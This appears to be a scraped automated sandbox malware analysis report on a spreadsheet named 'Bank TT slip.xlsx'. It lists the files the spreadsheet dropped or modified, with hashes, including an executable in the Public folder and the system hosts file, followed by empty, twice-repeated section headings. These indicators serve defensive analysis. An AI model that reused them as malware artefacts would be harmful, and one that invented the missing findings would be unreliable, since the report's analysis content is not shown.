C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D45E828D.png	PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced	590B1C3ECA38E4210C19A9BCBAF69F8D	556C229F539D60F1FF434103EC1695C7554EB720	E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE3E0A16.png	PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced	590B1C3ECA38E4210C19A9BCBAF69F8D	556C229F539D60F1FF434103EC1695C7554EB720	E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD51471F.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Temp\~DF7445FC000D331A6E.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFBAFAEA404D417564.TMP	CDFV2 Encrypted	2391E6AA319CBA9248661674AC5F2105	BBDB700FD74488CC9F3F3E4D66DE6B1321EE94B0	18FA3E8547F1B76B8A53B1169C4B3ED78F1A3EFB77163E0698AE3B1FAF7EFB71
C:\Users\user\AppData\Local\Temp\~DFC691B0AA0E02487B.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFDAC05FDF80BA3ECF.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\Desktop\~$Bank TT slip.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	F18604D5FC3E2930E85C403E0E80A459	AA0517C10C333F9A9A64EBA154EA915464EBF2BB	46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081
C:\Windows\System32\drivers\etc\hosts	ASCII text, with CRLF line terminators	6EB47C1CF858E25486E42440074917F2	6A63F93A95E1AE831C393A97158C526A4FA0FAAE	9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB

Windows Analysis Report
Bank TT slip.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Bank TT slip.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Bank TT slip.xlsx